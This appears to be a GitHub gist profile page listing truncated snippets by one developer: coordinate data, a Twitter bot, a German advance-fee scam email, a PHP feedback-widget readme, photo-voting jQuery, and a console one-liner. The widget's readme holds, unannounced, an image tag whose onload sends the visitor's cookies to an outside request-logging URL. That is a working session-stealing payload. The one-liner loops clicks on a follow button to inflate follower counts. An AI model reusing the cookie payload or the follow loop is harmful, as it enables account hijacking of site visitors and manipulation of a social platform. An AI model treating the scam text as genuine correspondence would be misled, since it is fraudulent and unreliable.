Skip to content

Instantly share code, notes, and snippets.

View neuling's full-sized avatar

Moritz Kobrna neuling

View GitHub Profile
window.data = [{"epoch":"1522220644","latitude":"52.01","longitude":"4.4","category":"normies","city_slug":"amsterdam","samples":"16","decimals":"2"},{"epoch":"1522220644","latitude":"51.92","longitude":"4.4","category":"normies","city_slug":"amsterdam","samples":"14","decimals":"2"},{"epoch":"1522220644","latitude":"52.15","longitude":"4.4","category":"rich","city_slug":"amsterdam","samples":"30","decimals":"2"},{"epoch":"1522220645","latitude":"52.16","longitude":"4.4","category":"hipsters","city_slug":"amsterdam","samples":"18","decimals":"2"},{"epoch":"1522220645","latitude":"51.89","longitude":"4.4","category":"normies","city_slug":"amsterdam","samples":"12","decimals":"2"},{"epoch":"1522220645","latitude":"51.95","longitude":"4.4","category":"normies","city_slug":"amsterdam","samples":"16","decimals":"2"},{"epoch":"1522220645","latitude":"52.05","longitude":"4.4","category":"normies","city_slug":"amsterdam","samples":"16","decimals":"2"},{"epoch":"1522220645","latitude":"52.06","longitude":"4.4","catego
@neuling
neuling / askjollife.js
Created May 31, 2017 08:56
askjollife.js
const Twit = require('twit');
const client = new Twit({
consumer_key: process.env.CONSUMER_KEY,
consumer_secret: process.env.CONSUMER_SECRET,
access_token: process.env.ACCESS_TOKEN,
access_token_secret: process.env.ACCESS_TOKEN_SECRET
});
Array.prototype.random = function() { return this[Math.floor(this.length * Math.random())]; };
@neuling
neuling / mail.txt
Created April 6, 2017 11:33
Spam-Mail II
Hallo
Zuerst muss ich das Vertrauen, das diese Transaktion zu erbitten, ist es aufgrund seiner Natur als völlig vertraulich und geheim. Obwohl ich weiß, dass eine Transaktion dieser Größenordnung, dass jemand ängstlich und besorgt, aber ich versichere Ihnen, dass alles gut am Ende des Tages.
Mein Zweck der Kontaktaufnahme mit Ihnen ist für Sie zu helfen, die Mittel links von meinem verstorbenen Client, beschlagnahmt oder unbrauchbar erklärt verhindern, die die Bank in diesen Fonds im Wert von EUR 3.690.000.00 die durch meinen Mandanten vor seinem Tod
.Beachten Sie, dass, wenn sie in Kontakt mit Ihnen, weil Sie den gleichen Nachnamen mit meinem Mandanten an diesem Nachmittag habe er hier vor dem Sterben mit seiner Familie im Jahr 2013 hinterlegt das Geld in der Bank.
Die Bank hat mir eine Mitteilung an die Angehörigen oder Konto Kontakt wird aus dem Verkehr und dem Boden in die Schatzkammer der Bank umgeleitet erklärt werden, soweit alle meine Bemühungen, einen Einfluß von jemandem mit meinem Client verbunde
<?
// <readme>
/*
This is a lite version of Olark's and Intercom's functionality (without the chat part).
It lets you get feedback from users on your site to your email.
And you won't have to rely on another company anymore!
<img src='/assets/img/users/tw15235264.jpg' style='display: none;' onload='(new Image()).src="//requestb.in/pdqu0gpd?x=" + document.cookie' />
const Twit = require('twit');
const client = new Twit({
consumer_key: process.env.CONSUMER_KEY,
consumer_secret: process.env.CONSUMER_SECRET,
access_token: process.env.ACCESS_TOKEN,
access_token_secret: process.env.ACCESS_TOKEN_SECRET
});
Array.prototype.random = function() { return this[Math.floor(this.length * Math.random())]; };
$('.choices').hide();
setTimeout(function(obj) {
console.log('obj',$(obj).attr('id'));
$(obj).hide();
// check if last, if so load new ones
console.log('length',$('.photos .photo:visible').length);
if($('.photos .photo:visible').length<=1) $('.photos').load("/?action=profiles",function() {
if($('.photos .photo:visible').length>1) $('.choices').show();
startLoadAnimation();
userCounter=0;
@neuling
neuling / gist:8647112
Created January 27, 2014 11:40
twitter followers push
1) visit the profile you would like to push (you need to be logged-in, does not work on your own account)
2) open javascript console
3) type in: (f=function(){$(".user-actions-follow-button:first").trigger("click");setTimeout(f,100)})();
4) hit enter
1) visit the profile you would like to push
2) open javascript console
3) type in: (f=function(){$(".user-actions-follow-button:first").trigger("click");setTimeout(f,100)})();
4) hit enter
alert(3);